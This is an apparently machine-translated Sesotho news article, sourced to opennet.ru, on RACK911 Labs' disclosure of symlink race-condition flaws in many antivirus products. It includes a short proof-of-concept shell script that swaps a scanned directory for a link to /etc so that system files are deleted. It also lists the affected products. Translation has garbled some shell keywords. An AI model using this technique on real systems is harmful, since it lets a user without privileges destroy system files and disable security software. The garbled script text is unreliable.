Bafuputsi ba tsoang ho RACK911 Labs hoo e batlang e le liphutheloana tsohle tsa antivirus bakeng sa Windows, Linux le macOS li ne li le kotsing ea ho hlaseloa ke maemo a morabe nakong ea ho hlakoloa ha lifaele tseo ho tsona ho fumanoeng malware.
Ho etsa tlhaselo, o hloka ho kenya faele eo antivirus e e bonang e le kotsi (mohlala, o ka sebelisa saena ea liteko), 'me ka mor'a nako e itseng, ka mor'a hore antivirus e fumane faele e mpe, empa hang-hang pele e bitsa mosebetsi. ho e hlakola, nkela bukana sebaka ka faele ka sehokelo sa tšoantšetso. Ho Windows, ho fihlela phello e ts'oanang, phetisetso ea li-directory e etsoa ho sebelisoa junction ea directory. Bothata ke hore hoo e ka bang li-antivirus tsohle ha lia ka tsa hlahloba lihokelo tsa tšoantšetso hantle, 'me, ka ho lumela hore li ne li hlakola faele e mpe, li hlakotse faele bukeng eo sehokelo sa tšoantšetso se supang ho eona.
Ho Linux le macOS ho bontšoa hore na ka tsela ena mosebelisi ea se nang tokelo a ka hlakola /etc/passwd kapa faele efe kapa efe ea sistimi, mme ho Windows laeborari ea DDL ea antivirus ka boeona ho thibela mosebetsi oa eona (ho Windows tlhaselo e lekanyelitsoe feela ho hlakola. lifaele tse sa sebelisoeng hajoale ke lits'ebetso tse ling). Ka mohlala, mohlaseli a ka etsa "ho sebelisa" directory 'me a kenya faele ea EpSecApiLib.dll ka signature ea kokoana-hloko ea teko ho eona,' me a nke sebaka sa "exploit" directory ka sehokelo "C:\Program Files (x86)\McAfee\ Endpoint Security\Endpoint Security” pele o e hlakola Platform", e leng se tla lebisa ho tlosoeng ha laeborari ea EpSecApiLib.dll lethathamong la li-antivirus. Ho Linux le macos, leqheka le ts'oanang le ka etsoa ka ho nkela bukana sebaka ka sehokelo sa "/ etc".
#! / bin / sh
rm -rf /home/user/exploit ; mkdir /home/user/exploit/
wget -q https://www.eicar.org/download/eicar.com.txt -O /home/user/exploit/passwd
ha e ntse e refywait -m "/home/user/exploit/passwd" | grep -m 5 “OPEN”
do
rm -rf /home/user/exploit ; ln -s /etc /home/user/exploit
e felile
Ho feta moo, mananeo a mangata a antivirus bakeng sa Linux le macOS a ile a fumanoa a sebelisa mabitso a lifaele tse boletsoeng esale pele ha a sebetsa le lifaele tsa nakoana ho li-directory tsa /tmp le /private/tmp, tse ka sebelisetsoang ho eketsa litokelo ho mosebelisi.
Ho fihlela joale, mathata a se a lokisitsoe ke bafani ba bangata, empa hoa hlokomeleha hore litsebiso tsa pele mabapi le bothata li rometsoe ho bahlahisi nakong ea hoetla ea 2018. Leha e se barekisi bohle ba lokolotseng lintlafatso, ba fuoe bonyane likhoeli tse 6 hore ba lokise, 'me RACK911 Labs e lumela hore joale e lokolohile ho senola bofokoli boo. Hoa hlokomeleha hore RACK911 Labs esale e sebetsa ho tsebahatsa bofokoli ka nako e telele, empa e ne e sa lebella hore ho tla ba thata hakana ho sebetsa le basebetsi mmoho le indasteri ea antivirus ka lebaka la tieho ea ho hlahisa liapdeite le ho hlokomoloha tlhoko ea ho lokisa ts'ireletso ka potlako. mathata.
Lihlahisoa tse amehang (sephutheloana sa mahala sa antivirus ClamAV ha se thathamisitsoe):
- Linux
- BitDefender GravityZone
- Tšireletso ea Comodo Endpoint
- Ts'ireletso ea Server ea Eset
- F-Sireletsa Linux Security
- Ts'ireletso ea Kaspersy Endpoint
- Ts'ireletso ea McAfee Endpoint
- Sophos Anti-Virus bakeng sa Linux
- Windows
- Khahlano le vaerase ea mahala ea Avast
- Avira Free Anti-Virus
- BitDefender GravityZone
- Tšireletso ea Comodo Endpoint
- Ts'ireletso ea Khomphutha ea F-Secure
- Ts'ireletso ea FireEye Endpoint
- Thibela X (Sophos)
- Ts'ireletso ea Kaspersky Endpoint
- Malwarebytes bakeng sa Windows
- Ts'ireletso ea McAfee Endpoint
- Sebaka sa panda
- Webroot e Sireletsehile Hohle
- macOS
- AVG
- BitDefender Kakaretso ea Ts'ireletso
- Ts'ireletso ea Eset Cyber
- Kaspersky Internet Security
- McAfee Total Protection
- Microsoft Defender (BETA)
- Tšireletso ea Norton
- Lehae la Sophos
- Webroot e Sireletsehile Hohle
Source: opennet.ru